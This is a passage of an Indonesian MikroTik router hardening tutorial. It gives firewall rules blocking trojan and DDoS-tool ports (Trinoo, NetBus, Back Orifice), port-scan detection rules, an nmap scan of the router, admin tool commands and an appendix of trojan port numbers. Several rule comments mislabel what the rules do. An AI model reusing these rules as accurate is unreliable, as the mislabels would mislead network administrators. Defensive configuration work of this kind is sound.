/&gt;--------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Untuk kali ini kita akan lihat konfigurasi pada ip firewall filternya.&lt;br /&gt;&lt;br /&gt;Karena Luasnya parameter dari firewall filter ini untuk pembahasan Firewall&lt;br /&gt;Filter selengkapnya dapat dilihat pada manual mikrotik, di&lt;br /&gt;http://www.mikrotik.com/testdocs/ros/2.9/ip/filter.php&lt;br /&gt;&lt;br /&gt;Konfigurasi dibawah ini dapat memblokir beberapa Trojan, Virus, Backdoor&lt;br /&gt;yang telah dikenali sebelumnya baik Nomor Port yang dipakai serta Protokolnya.&lt;br /&gt;Juga telah di konfigurasikan untuk menahan Flooding dari Jaringan Publik dan&lt;br /&gt;jaringan Lokal. Serta pemberian rule untuk Access control agar, Rentang&lt;br /&gt;jaringan tertentu saja yang bisa melakukan Remote atau mengakses service&lt;br /&gt;tertentu terhadap Mesin Mikrotik kita.&lt;br /&gt;&lt;br /&gt;Contoh Aplikasi Filternya&lt;br /&gt;-----------------------------------------------------------------------------&lt;br /&gt;/ ip firewall filter&lt;br /&gt;add chain=input connection-state=invalid action=drop comment="Drop Invalid \&lt;br /&gt;  connections" disabled=no&lt;br /&gt;add chain=input src-address=!192.168.0.0/27 protocol=tcp src-port=1024-65535 \&lt;br /&gt;  dst-port=8080 action=drop comment="Block to Proxy" disabled=no&lt;br /&gt;add chain=input protocol=udp dst-port=12667 action=drop comment="Trinoo" \&lt;br /&gt;  disabled=no&lt;br /&gt;add chain=input protocol=udp dst-port=27665 action=drop comment="Trinoo" \&lt;br /&gt;  disabled=no&lt;br /&gt;add chain=input protocol=udp dst-port=31335 action=drop comment="Trinoo" \&lt;br /&gt;  disabled=no&lt;br /&gt;add chain=input protocol=udp dst-port=27444 action=drop comment="Trinoo" \&lt;br /&gt;  disabled=no&lt;br /&gt;add chain=input protocol=udp dst-port=34555 action=drop comment="Trinoo" \&lt;br /&gt;  disabled=no&lt;br /&gt;add chain=input protocol=udp dst-port=35555 action=drop comment="Trinoo" \&lt;br /&gt;  disabled=no&lt;br /&gt;add chain=input protocol=tcp dst-port=27444 action=drop comment="Trinoo" \&lt;br /&gt;  disabled=no&lt;br /&gt;add chain=input protocol=tcp dst-port=27665 action=drop comment="Trinoo" \&lt;br /&gt;  disabled=no&lt;br /&gt;add chain=input protocol=tcp dst-port=31335 action=drop comment="Trinoo" \&lt;br /&gt;  disabled=no&lt;br /&gt;add chain=input protocol=tcp dst-port=31846 action=drop comment="Trinoo" \&lt;br /&gt;  disabled=no&lt;br /&gt;add chain=input protocol=tcp dst-port=34555 action=drop comment="Trinoo" \&lt;br /&gt;  disabled=no&lt;br /&gt;add chain=input protocol=tcp dst-port=35555 action=drop comment="Trinoo" \&lt;br /&gt;  disabled=no&lt;br /&gt;add chain=input connection-state=established action=accept comment="Allow \&lt;br /&gt;  Established connections" disabled=no&lt;br /&gt;add chain=input protocol=udp action=accept comment="Allow UDP" disabled=no&lt;br /&gt;add chain=input protocol=icmp action=accept comment="Allow ICMP" disabled=no&lt;br /&gt;add chain=input src-address=192.168.0.0/27 action=accept comment="Allow access \&lt;br /&gt;  to router from known network" disabled=no&lt;br /&gt;add chain=input action=drop comment="Drop anything else" disabled=no&lt;br /&gt;add chain=forward protocol=tcp connection-state=invalid action=drop \&lt;br /&gt;  comment="drop invalid connections" disabled=no&lt;br /&gt;add chain=forward connection-state=established action=accept comment="allow \&lt;br /&gt;  already established connections" disabled=no&lt;br /&gt;add chain=forward connection-state=related action=accept comment="allow \&lt;br /&gt;  related connections" disabled=no&lt;br /&gt;add chain=forward src-address=0.0.0.0/8 action=drop comment="" disabled=no&lt;br /&gt;add chain=forward dst-address=0.0.0.0/8 action=drop comment="" disabled=no&lt;br /&gt;add chain=forward src-address=127.0.0.0/8 action=drop comment="" disabled=no&lt;br /&gt;add chain=forward dst-address=127.0.0.0/8 action=drop comment="" disabled=no&lt;br /&gt;add chain=forward src-address=224.0.0.0/3 action=drop comment="" disabled=no&lt;br /&gt;add chain=forward dst-address=224.0.0.0/3 action=drop comment="" disabled=no&lt;br /&gt;add chain=forward protocol=tcp action=jump jump-target=tcp comment="" \&lt;br /&gt;  disabled=no&lt;br /&gt;add chain=forward protocol=udp action=jump jump-target=udp comment="" \&lt;br /&gt;  disabled=no&lt;br /&gt;add chain=forward protocol=icmp action=jump jump-target=icmp comment="" \&lt;br /&gt;  disabled=no&lt;br /&gt;add chain=tcp protocol=tcp dst-port=69 action=drop comment="deny TFTP" \&lt;br /&gt;  disabled=no&lt;br /&gt;add chain=tcp protocol=tcp dst-port=111 action=drop comment="deny RPC \&lt;br /&gt;  portmapper" disabled=no&lt;br /&gt;add chain=tcp protocol=tcp dst-port=135 action=drop comment="deny RPC \&lt;br /&gt;  portmapper" disabled=no&lt;br /&gt;add chain=tcp protocol=tcp dst-port=137-139 action=drop comment="deny NBT" \&lt;br /&gt;  disabled=no&lt;br /&gt;add chain=tcp protocol=tcp dst-port=445 action=drop comment="deny cifs" \&lt;br /&gt;  disabled=no&lt;br /&gt;add chain=tcp protocol=tcp dst-port=2049 action=drop comment="deny NFS" \&lt;br /&gt;  disabled=no&lt;br /&gt;add chain=tcp protocol=tcp dst-port=12345-12346 action=drop comment="deny \&lt;br /&gt;  NetBus" disabled=no&lt;br /&gt;add chain=tcp protocol=tcp dst-port=20034 action=drop comment="deny NetBus" \&lt;br /&gt;  disabled=no&lt;br /&gt;add chain=tcp protocol=tcp dst-port=3133 action=drop comment="deny \&lt;br /&gt;  BackOriffice" disabled=no&lt;br /&gt;add chain=tcp protocol=tcp dst-port=67-68 action=drop comment="deny DHCP" \&lt;br /&gt;  disabled=no&lt;br /&gt;add chain=udp protocol=udp dst-port=69 action=drop comment="deny TFTP" \&lt;br /&gt;  disabled=no&lt;br /&gt;add chain=udp protocol=udp dst-port=111 action=drop comment="deny PRC \&lt;br /&gt;  portmapper" disabled=no&lt;br /&gt;add chain=udp protocol=udp dst-port=135 action=drop comment="deny PRC \&lt;br /&gt;  portmapper" disabled=no&lt;br /&gt;add chain=udp protocol=udp dst-port=137-139 action=drop comment="deny NBT" \&lt;br /&gt;  disabled=no&lt;br /&gt;add chain=udp protocol=udp dst-port=2049 action=drop comment="deny NFS" \&lt;br /&gt;  disabled=no&lt;br /&gt;add chain=udp protocol=udp dst-port=3133 action=drop comment="deny \&lt;br /&gt;  BackOriffice" disabled=no&lt;br /&gt;add chain=input protocol=tcp psd=21,3s,3,1 action=add-src-to-address-list \&lt;br /&gt;  address-list="port scanners" address-list-timeout=2w comment="Port \&lt;br /&gt;  scanners to list " disabled=no&lt;br /&gt;add chain=input protocol=tcp tcp-flags=fin,!syn,!rst,!psh,!ack,!urg \&lt;br /&gt;  action=add-src-to-address-list address-list="port scanners" \&lt;br /&gt;  address-list-timeout=2w comment="NMAP FIN Stealth scan" disabled=no&lt;br /&gt;add chain=input protocol=tcp tcp-flags=fin,syn action=add-src-to-address-list \&lt;br /&gt;  address-list="port scanners" address-list-timeout=2w comment="SYN/FIN \&lt;br /&gt;  scan" disabled=no&lt;br /&gt;add chain=input protocol=tcp tcp-flags=syn,rst action=add-src-to-address-list \&lt;br /&gt;  address-list="port scanners" address-list-timeout=2w comment="SYN/RST \&lt;br /&gt;  scan" disabled=no&lt;br /&gt;add chain=input protocol=tcp tcp-flags=fin,psh,urg,!syn,!rst,!ack \&lt;br /&gt;  action=add-src-to-address-list address-list="port scanners" \&lt;br /&gt;  address-list-timeout=2w comment="FIN/PSH/URG scan" disabled=no&lt;br /&gt;add chain=input protocol=tcp tcp-flags=fin,syn,rst,psh,ack,urg \&lt;br /&gt;  action=add-src-to-address-list address-list="port scanners" \&lt;br /&gt;  address-list-timeout=2w comment="ALL/ALL scan" disabled=no&lt;br /&gt;add chain=input protocol=tcp tcp-flags=!fin,!syn,!rst,!psh,!ack,!urg \&lt;br /&gt;  action=add-src-to-address-list address-list="port scanners" \&lt;br /&gt;  address-list-timeout=2w comment="NMAP NULL scan" disabled=no&lt;br /&gt;add chain=input src-address-list="port scanners" action=drop comment="dropping \&lt;br /&gt;  port scanners" disabled=no&lt;br /&gt;add chain=icmp protocol=icmp icmp-options=0:0 action=accept comment="drop \&lt;br /&gt;  invalid connections" disabled=no&lt;br /&gt;add chain=icmp protocol=icmp icmp-options=3:0 action=accept comment="allow \&lt;br /&gt;  established connections" disabled=no&lt;br /&gt;add chain=icmp protocol=icmp icmp-options=3:1 action=accept comment="allow \&lt;br /&gt;  already established connections" disabled=no&lt;br /&gt;add chain=icmp protocol=icmp icmp-options=4:0 action=accept comment="allow \&lt;br /&gt;  source quench" disabled=no&lt;br /&gt;add chain=icmp protocol=icmp icmp-options=8:0 action=accept comment="allow \&lt;br /&gt;  echo request" disabled=no&lt;br /&gt;add chain=icmp protocol=icmp icmp-options=11:0 action=accept comment="allow \&lt;br /&gt;  time exceed" disabled=no&lt;br /&gt;add chain=icmp protocol=icmp icmp-options=12:0 action=accept comment="allow \&lt;br /&gt;  parameter bad" disabled=no&lt;br /&gt;add chain=icmp action=drop comment="deny all other types" disabled=no&lt;br /&gt;add chain=tcp protocol=tcp dst-port=25 action=reject \&lt;br /&gt;  reject-with=icmp-network-unreachable comment="Smtp" disabled=no&lt;br /&gt;add chain=tcp protocol=udp dst-port=25 action=reject \&lt;br /&gt;  reject-with=icmp-network-unreachable comment="Smtp" disabled=no&lt;br /&gt;add chain=tcp protocol=tcp dst-port=110 action=reject \&lt;br /&gt;  reject-with=icmp-network-unreachable comment="Smtp" disabled=no&lt;br /&gt;add chain=tcp protocol=udp dst-port=110 action=reject \&lt;br /&gt;  reject-with=icmp-network-unreachable comment="Smtp" disabled=no&lt;br /&gt;add chain=tcp protocol=udp dst-port=110 action=reject \&lt;br /&gt;  reject-with=icmp-network-unreachable comment="Smtp" disabled=no&lt;br /&gt;-----------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;--[11.1]-- Service dan Melihat Service yang Aktif dengan PortScanner&lt;br /&gt;&lt;br /&gt;Untuk memastikan Service apa saja yang aktif di Mesin mikrotik, perlu kita&lt;br /&gt;pindai terhadap port tertentu, seandainya ada service yang tidak dibutuhkan,&lt;br /&gt;sebaiknya dimatikan saja.&lt;br /&gt;&lt;br /&gt;Untuk menonaktifkan dan mengaktifkan servise, perintah adalah :&lt;br /&gt;&lt;br /&gt;Kita periksa dahulu service apa saja yang aktif&lt;br /&gt;&lt;br /&gt;----------------------------------------------------------------------------------&lt;br /&gt;[admin@routerku] &gt; ip service&lt;br /&gt;[admin@routerku] ip service&gt; print&lt;br /&gt;Flags: X - disabled, I - invalid&lt;br /&gt;#   NAME                                  PORT  ADDRESS            CERTIFICATE&lt;br /&gt;0 X telnet                                23    0.0.0.0/0       &lt;br /&gt;1   ftp                                   21    0.0.0.0/0       &lt;br /&gt;2   www                                   80    0.0.0.0/0       &lt;br /&gt;3   ssh                                   22    0.0.0.0/0       &lt;br /&gt;4   www-ssl                               443   0.0.0.0/0          none     &lt;br /&gt;[admin@routerku] ip service&gt;&lt;br /&gt;----------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Misalkan service FTP akan dinonaktifkan, yaitu di daftar diatas terletak pada&lt;br /&gt;nomor 1 (lihat bagian Flags) maka :&lt;br /&gt;&lt;br /&gt;---------------------------------------------------------------------------------&lt;br /&gt;[admin@routerku] ip service&gt; set 1 disabled=yes&lt;br /&gt;---------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Perlu kita periksa lagi,&lt;br /&gt;&lt;br /&gt;---------------------------------------------------------------------------------&lt;br /&gt;[admin@routerku] ip service&gt; print&lt;br /&gt;Flags: X - disabled, I - invalid&lt;br /&gt;#   NAME                                  PORT  ADDRESS            CERTIFICATE&lt;br /&gt;0 X telnet                                23    0.0.0.0/0       &lt;br /&gt;1 X ftp                                   21    0.0.0.0/0       &lt;br /&gt;2   www                                   80    0.0.0.0/0       &lt;br /&gt;3   ssh                                   22    0.0.0.0/0       &lt;br /&gt;4   www-ssl                               443   0.0.0.0/0          none     &lt;br /&gt;[admin@router.dprd.provinsi] ip service&gt;&lt;br /&gt;---------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Sekarang service FTP telah dinonaktifkan.&lt;br /&gt;&lt;br /&gt;Dengan memakai tool nmap kita dapat mencek port apa saja yang aktif pada mesin&lt;br /&gt;gateway yang telah dikonfigurasikan.&lt;br /&gt;&lt;br /&gt;Perintah : nmap -vv -sS -sV -P0 192.168.0.30&lt;br /&gt;&lt;br /&gt;Hasil :&lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------&lt;br /&gt;Starting Nmap 4.20 ( http://insecure.org ) at 2007-04-04 19:55 SE Asia Standard Time&lt;br /&gt;Initiating ARP Ping Scan at 19:55&lt;br /&gt;Scanning 192.168.0.30 [1 port]&lt;br /&gt;Completed ARP Ping Scan at 19:55, 0.31s elapsed (1 total hosts)&lt;br /&gt;Initiating Parallel DNS resolution of 1 host. at 19:55&lt;br /&gt;Completed Parallel DNS resolution of 1 host. at 19:55, 0.05s elapsed&lt;br /&gt;Initiating SYN Stealth Scan at 19:55&lt;br /&gt;Scanning  192.168.0.30 [1697 ports]&lt;br /&gt;Discovered open port 22/tcp on 192.168.0.30&lt;br /&gt;Discovered open port 53/tcp on 192.168.0.30&lt;br /&gt;Discovered open port 80/tcp on 192.168.0.30&lt;br /&gt;Discovered open port 21/tcp on 192.168.0.30&lt;br /&gt;Discovered open port 3986/tcp on 192.168.0.30&lt;br /&gt;Discovered open port 2000/tcp on 192.168.0.30&lt;br /&gt;Discovered open port 8080/tcp on 192.168.0.30&lt;br /&gt;Discovered open port 3128/tcp on 192.168.0.30&lt;br /&gt;Completed SYN Stealth Scan at 19:55, 7.42s elapsed (1697 total ports)&lt;br /&gt;Initiating Service scan at 19:55&lt;br /&gt;Scanning 8 services on 192.168.0.30&lt;br /&gt;Completed Service scan at 19:57, 113.80s elapsed (8 services on 1 host)&lt;br /&gt;Host  192.168.0.30 appears to be up ... good.&lt;br /&gt;Interesting ports on 192.168.0.30:&lt;br /&gt;Not shown: 1689 closed ports&lt;br /&gt;PORT     STATE SERVICE         VERSION&lt;br /&gt;21/tcp   open  ftp             MikroTik router ftpd 2.9.27&lt;br /&gt;22/tcp   open  ssh             OpenSSH 2.3.0 mikrotik 2.9.27 (protocol 1.99)&lt;br /&gt;53/tcp   open  domain?&lt;br /&gt;80/tcp   open  http            MikroTik router http config&lt;br /&gt;2000/tcp open  callbook?&lt;br /&gt;3128/tcp open  http-proxy      Squid webproxy 2.5.STABLE11&lt;br /&gt;3986/tcp open  mapper-ws_ethd?&lt;br /&gt;8080/tcp open  http-proxy      Squid webproxy 2.5.STABLE11&lt;br /&gt;2 services unrecognized despite returning data. If you know the service/version,&lt;br /&gt;please submit the following fingerprints at&lt;br /&gt;http://www.insecure.org/cgi-bin/servicefp-submit.cgi :&lt;br /&gt;&lt;br /&gt;==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============&lt;br /&gt;SF-Port53-TCP:V=4.20%I=7%D=4/4%Time=4613A03C%P=i686-pc-windows-windows%r(D&lt;br /&gt;SF:NSVersionBindReq,E,"\0\x0c\0\x06\x81\x84\0\0\0\0\0\0\0\0")%r(DNSStatusR&lt;br /&gt;SF:equest,E,"\0\x0c\0\0\x90\x84\0\0\0\0\0\0\0\0");&lt;br /&gt;==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============&lt;br /&gt;SF-Port2000-TCP:V=4.20%I=7%D=4/4%Time=4613A037%P=i686-pc-windows-windows%r&lt;br /&gt;SF:(NULL,4,"\x01\0\0\0")%r(GenericLines,4,"\x01\0\0\0")%r(GetRequest,18,"\&lt;br /&gt;SF:x01\0\0\0\x02\0\0\0d\?\xe4{\x9d\x02\x1a\xcc\x8b\xd1V\xb2F\xff9\xb0")%r(&lt;br /&gt;SF:HTTPOptions,18,"\x01\0\0\0\x02\0\0\0d\?\xe4{\x9d\x02\x1a\xcc\x8b\xd1V\x&lt;br /&gt;SF:b2F\xff9\xb0")%r(RTSPRequest,18,"\x01\0\0\0\x02\0\0\0d\?\xe4{\x9d\x02\x&lt;br /&gt;SF:1a\xcc\x8b\xd1V\xb2F\xff9\xb0")%r(RPCCheck,18,"\x01\0\0\0\x02\0\0\0d\?\&lt;br /&gt;SF:xe4{\x9d\x02\x1a\xcc\x8b\xd1V\xb2F\xff9\xb0")%r(DNSVersionBindReq,18,"\&lt;br /&gt;SF:x01\0\0\0\x02\0\0\0d\?\xe4{\x9d\x02\x1a\xcc\x8b\xd1V\xb2F\xff9\xb0")%r(&lt;br /&gt;SF:DNSStatusRequest,4,"\x01\0\0\0")%r(Help,4,"\x01\0\0\0")%r(X11Probe,4,"\&lt;br /&gt;SF:x01\0\0\0")%r(FourOhFourRequest,18,"\x01\0\0\0\x02\0\0\0\xb9\x15&amp;\xf1A\&lt;br /&gt;SF:]\+\x11\n\xf6\x9b\xa0,\xb0\xe1\xa5")%r(LPDString,4,"\x01\0\0\0")%r(LDAP&lt;br /&gt;SF:BindReq,4,"\x01\0\0\0")%r(LANDesk-RC,18,"\x01\0\0\0\x02\0\0\0\xb9\x15&amp;amp;\&lt;br /&gt;SF:xf1A\]\+\x11\n\xf6\x9b\xa0,\xb0\xe1\xa5")%r(TerminalServer,4,"\x01\0\0\&lt;br /&gt;SF:0")%r(NCP,18,"\x01\0\0\0\x02\0\0\0\xb9\x15&amp;\xf1A\]\+\x11\n\xf6\x9b\xa0,&lt;br /&gt;SF:\xb0\xe1\xa5")%r(NotesRPC,18,"\x01\0\0\0\x02\0\0\0\xb9\x15&amp;amp;\xf1A\]\+\x1&lt;br /&gt;SF:1\n\xf6\x9b\xa0,\xb0\xe1\xa5")%r(NessusTPv10,4,"\x01\0\0\0");&lt;br /&gt;MAC Address: 00:90:4C:91:77:02 (Epigram)&lt;br /&gt;Service Info: Host: routerku; Device: router&lt;br /&gt;&lt;br /&gt;Service detection performed. Please report any incorrect results at&lt;br /&gt;http://insecure.org/nmap/submit/ .&lt;br /&gt;&lt;br /&gt;Nmap finished: 1 IP address (1 host up) scanned in 123.031 seconds&lt;br /&gt;             Raw packets sent: 1706 (75.062KB) | Rcvd: 1722 (79.450KB)&lt;br /&gt;&lt;br /&gt;---------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Dari hasil scanning tersebut dapat kita ambil kesimpulan, bahwa service dan&lt;br /&gt;port yang aktif adalah FTP dalam versi MikroTik router ftpd 2.9.27. Untuk&lt;br /&gt;SSH dengan versi OpenSSH 2.3.0 mikrotik 2.9.27 (protocol 1.99). Serta Web&lt;br /&gt;proxy memakai Squid dalam versi Squid webproxy 2.5.STABLE11.&lt;br /&gt;&lt;br /&gt;Tentu saja pihak vendor mikrotik telah melakukan patch terhadap Hole atau&lt;br /&gt;Vulnerabilities dari Versi Protocol diatas.&lt;br /&gt;&lt;br /&gt;--[11.2]-- Tool administrasi Jaringan&lt;br /&gt;&lt;br /&gt;Secara praktis terdapat beberapa tool yang dapat dimanfaatkan dalam mela&lt;br /&gt;kukan troubleshooting jaringan, seperti tool ping, traceroute, SSH, dll.&lt;br /&gt;Beberapa tool yang sering digunakan nantinya dalam administrasi sehari-hari&lt;br /&gt;adalah :&lt;br /&gt;&lt;br /&gt;o Telnet&lt;br /&gt;o SSH&lt;br /&gt;o Traceroute&lt;br /&gt;o Sniffer&lt;br /&gt;&lt;br /&gt;a. Telnet&lt;br /&gt;Perintah remote mesin ini hampir sama penggunaan dengan telnet yang ada&lt;br /&gt;di Linux atau Windows.&lt;br /&gt;&lt;br /&gt;[admin@routerku] &gt; system telnet ?&lt;br /&gt;&lt;br /&gt;Perintah diatas untuk melihat sekilias paramater apa saja yang ada. Misalnya&lt;br /&gt;mesin remote dengan ip address 192.168.0.21 dan port 23. Maka&lt;br /&gt;&lt;br /&gt;[admin@routerku] &gt; system telnet 192.168.0.21&lt;br /&gt;&lt;br /&gt;Penggunaan telnet sebaiknya dibatasi untuk kondisi tertentu dengan alasan&lt;br /&gt;keamanan, seperti kita ketahui, packet data yang dikirim melalui telnet&lt;br /&gt;belum di enskripsi. Agar lebih amannya kita pergunakan SSH.&lt;br /&gt;&lt;br /&gt;b. SSH&lt;br /&gt;Sama dengan telnet perintah ini juga diperlukan dalam remote mesin, serta&lt;br /&gt;pringsipnya sama juga parameternya dengan perintah di Linux dan Windows.&lt;br /&gt;&lt;br /&gt;[admin@routerku] &gt; system ssh 192.168.0.21&lt;br /&gt;&lt;br /&gt;Parameter SSH diatas, sedikit perbedaan dengan telnet. Jika lihat helpnya&lt;br /&gt;memiliki parameter tambahan yaitu user.&lt;br /&gt;&lt;br /&gt;------------------------------------------------------------------------------&lt;br /&gt;[admin@routerku] &gt; system ssh ?&lt;br /&gt;The SSH feature can be used with various SSH Telnet clients to securely connect&lt;br /&gt;to and administrate the router&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;address&gt;&lt;span style="font-size:78%;"&gt; --&lt;br /&gt;user -- User name&lt;br /&gt;port -- Port number&lt;br /&gt;&lt;br /&gt;[admin@routerku] &gt;&lt;br /&gt;------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Misalkan kita akan melakukan remote pada suatu mesin dengan sistem&lt;br /&gt;operasinya Linux, yang memiliki Account, username Root dan Password&lt;br /&gt;123456 pada Address 66.213.7.30. Maka perintahnya,&lt;br /&gt;&lt;br /&gt;-----------------------------------------------------------------------------&lt;br /&gt;[admin@routerku] &gt; system ssh 66.213.7.30 user=root&lt;br /&gt;root@66.213.7.30's password:&lt;br /&gt;----------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;c. Traceroute&lt;br /&gt;&lt;br /&gt;Mengetahui hops atau router apa saja yang dilewati suatu packet sampai packet&lt;br /&gt;itu terkirim ke tujuan, lazimnya kita menggunakan traceroute. Dengan tool ini&lt;br /&gt;dapat di analisa kemana saja route dari jalannya packet.&lt;br /&gt;&lt;br /&gt;Misalkan ingin mengetahui jalannya packet yang menuju server yahoo, maka:&lt;br /&gt;&lt;br /&gt;----------------------------------------------------------------------------&lt;br /&gt;[admin@routerku] &gt; tool traceroute yahoo.com  ADDRESS  STATUS&lt;br /&gt; 1 63.219.6.nnn    00:00:00 00:00:00 00:00:00&lt;br /&gt; 2 222.124.4.nnn   00:00:00 00:00:00 00:00:00&lt;br /&gt; 3 192.168.34.41   00:00:00 00:00:00 00:00:00&lt;br /&gt; 4 61.94.1.253     00:00:00 00:00:00 00:00:00&lt;br /&gt; 5 203.208.143.173 00:00:00 00:00:00 00:00:00&lt;br /&gt; 6 203.208.182.5   00:00:00 00:00:00 00:00:00&lt;br /&gt; 7 203.208.182.114 00:00:00 00:00:00 00:00:00&lt;br /&gt; 8 203.208.168.118 00:00:00 00:00:00 00:00:00&lt;br /&gt; 9 203.208.168.134  timeout 00:00:00 00:00:00&lt;br /&gt;10 216.115.101.34  00:00:00  timeout  timeout&lt;br /&gt;11 216.115.101.129  timeout  timeout 00:00:00&lt;br /&gt;12 216.115.108.1    timeout  timeout 00:00:00&lt;br /&gt;13 216.109.120.249 00:00:00 00:00:00 00:00:00&lt;br /&gt;14 216.109.112.135 00:00:00  timeout  timeout&lt;br /&gt;------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;d. Sniffer&lt;br /&gt;&lt;br /&gt;Kita dapat menangkap dan menyadap packet-packet yang berjalan&lt;br /&gt;di jaringan kita, tool ini telah disediakan oleh Mikrotik yang berguna&lt;br /&gt;dalam menganalisa trafik.&lt;br /&gt;&lt;br /&gt;----------------------------------------------------------------------------&lt;br /&gt;[admin@routerku] &gt; tool sniffer&lt;br /&gt;Packet sniffering&lt;br /&gt;&lt;br /&gt;.. -- go up to tool&lt;br /&gt;start -- Start/reset sniffering&lt;br /&gt;stop -- Stop sniffering&lt;br /&gt;save -- Save currently sniffed packets&lt;br /&gt;packet/ -- Sniffed packets management&lt;br /&gt;protocol/ -- Protocol management&lt;br /&gt;host/ -- Host management&lt;br /&gt;connection/ -- Connection management&lt;br /&gt;print --&lt;br /&gt;get -- get value of property&lt;br /&gt;set --&lt;br /&gt;edit -- edit value of property&lt;br /&gt;export --&lt;br /&gt;----------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Untuk memulai proses sniffing dapat menggunakan perintah Start, sedangkan&lt;br /&gt;menghentikannya dapat menggunaka perintah Stop.&lt;br /&gt;&lt;br /&gt;[admin@routerku] &gt; tool sniffer start&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Proses sniffing sedang dikerjakan, tunggu saja beberapa lama, kemudian&lt;br /&gt;ketikkan perintah stop jika ingin menghentikannya. Melihat hasil packet&lt;br /&gt;yang ditangkap dapat menggunakan perintah print, untuk mengeksportnya&lt;br /&gt;dalam bentuk file dapat digunakan perintah export.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--[12]-- Kesimpulan&lt;br /&gt;&lt;br /&gt;Untuk pemakaian jaringan berskala Kecil-menengah produk dari Latvia ini,&lt;br /&gt;dapat menjadi pilihan, saya disini bukan untuk mempromosikan Produk ini.&lt;br /&gt;Namun sebagai gambaran, bagaimana memanfaatkan produk ini untuk berbagai&lt;br /&gt;keperluan, lagipula sebagai alternatif dari produk sejenis yang harganya&lt;br /&gt;cenderung mahal.&lt;br /&gt;&lt;br /&gt;Dengan Mikrotik yang saat ini sedang populernya diterapkan pada berbagai&lt;br /&gt;ISP Wireless, Warnet-warnet serta beberapa Perusahaan. Maka Administrasi&lt;br /&gt;Sistem Jaringan dapat lebih mudah dan sederhana. Yang jelas untuk sekedar&lt;br /&gt;memanfaatkan fasilitas Routing saja, PC TUA anda dapat digunakan.&lt;br /&gt;&lt;br /&gt;Mudah-mudahan paparan diatas dapat membantu pembaca dalam memahami, apa&lt;br /&gt;dan bagaimana mikrotik ini.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--[13]-- Referensi&lt;br /&gt;&lt;br /&gt;Artikel ini merupakan kompilasi dari berbagai sumber&lt;br /&gt;&lt;br /&gt;1. Web Blog&lt;br /&gt; - http://dhanis.web.id&lt;br /&gt; - http://okawardhana.web.id&lt;br /&gt; - http://harrychanputra.web.id&lt;br /&gt;&lt;br /&gt;2. Website&lt;br /&gt; - http://www.cgd.co.id&lt;br /&gt; - http://www.ilmukomputer.org&lt;br /&gt; - http://www.mikrotik.com&lt;br /&gt; - http://www.mikrotik.co.id&lt;br /&gt; - http://forum.mikrotik.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;oO Using no way as a way, Using no limitations as a limitation Oo&lt;br /&gt;&lt;br /&gt;Salam dan terimakasih,&lt;br /&gt;r0t0r &lt;rotor@kecoak-elektronik.net&gt;&lt;br /&gt;-----------------------------------------------------------------------&lt;br /&gt;Copyleft Unreserved by Law 1995 - 2007 Kecoak Elektronik Indonesia&lt;br /&gt;http://www.kecoak-elektronik.net&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;.L.A.M.P.I.R.A.N.&lt;br /&gt;&lt;br /&gt;Daftar Port dan Protocol berbagai jenis Trojan, Backdoor, Virus.&lt;br /&gt;daftar ini dapat saja tidak berlaku, atau dapat pula perlu ditambah&lt;br /&gt;seiring perkembangan Malware tersebut. Update terus Filter Rule&lt;br /&gt;mesin mikrotik anda.&lt;br /&gt;&lt;br /&gt;2000 Cracks 6776 TCP&lt;br /&gt;Acid Battery 32418 TCP&lt;br /&gt;Acid Battery 2000 52317 TCP&lt;br /&gt;Acid Shivers 10520 TCP&lt;br /&gt;Agent 31 31 TCP&lt;br /&gt;Agent 40421 40421 TCP&lt;br /&gt;Aim Spy 777 TCP&lt;br /&gt;Ajan 25 TCP&lt;br /&gt;Ambush 10666 UDP&lt;br /&gt;AntiGen 25 TCP&lt;br /&gt;AOL Trojan 30029 TCP&lt;br /&gt;Attack FTP 666 TCP&lt;br /&gt;Back Construction 666/5400/5401 TCP&lt;br /&gt;Back Door Setup 5000/5001/7789 TCP&lt;br /&gt;Back Orifice 31337/31338 UDP&lt;br /&gt;Back Orifice 2000 8787/54320/54321 TCP&lt;br /&gt;Back Orifice DLL 1349 UDP&lt;br /&gt;BackDoor 1999 TCP&lt;br /&gt;BackDoor-G 1243/6776 TCP&lt;br /&gt;BackDoor-QE 10452 TCP&lt;br /&gt;BackDoor-QO 3332 TCP&lt;br /&gt;BackDoor-QR 12973/12975 TCP&lt;br /&gt;BackFire 31337 UDP&lt;br /&gt;Baron Night 31337 TCP&lt;br /&gt;Big Gluck (TN) 34324 TCP&lt;br /&gt;BioNet 12349 TCP&lt;br /&gt;Bla 1042/20331 TCP&lt;br /&gt;Black Construction 21 TCP&lt;br /&gt;Blade Runner 21/5400-5402 TCP&lt;br /&gt;BO client 31337 TCP&lt;br /&gt;BO Facil 5556/5557/31337 TCP&lt;br /&gt;Bo Wack 31336 TCP&lt;br /&gt;BoBo 4321 TCP&lt;br /&gt;BOWhack 31666 TCP&lt;br /&gt;BrainSpy 10101 TCP&lt;br /&gt;Bubbel 5000 TCP&lt;br /&gt;BugBear 36794 TCP&lt;br /&gt;Bugs 2115 TCP&lt;br /&gt;Bunker-Hill 61348/61603/63485 TCP&lt;br /&gt;Cain e Abel 666 TCP&lt;br /&gt;Chargen 9 UDP&lt;br /&gt;Chupacabra 20203 TCP&lt;br /&gt;Coma 10607 TCP&lt;br /&gt;Cyber Attacker 9876 TCP&lt;br /&gt;Dark Shadow 911 TCP&lt;br /&gt;Death 2 TCP&lt;br /&gt;Deep Back Orifice 31338 UDP&lt;br /&gt;Deep Throat 41/2140/3150/6771 TCP&lt;br /&gt;Deep Throat v2 2140/3150/6670/6711/60000 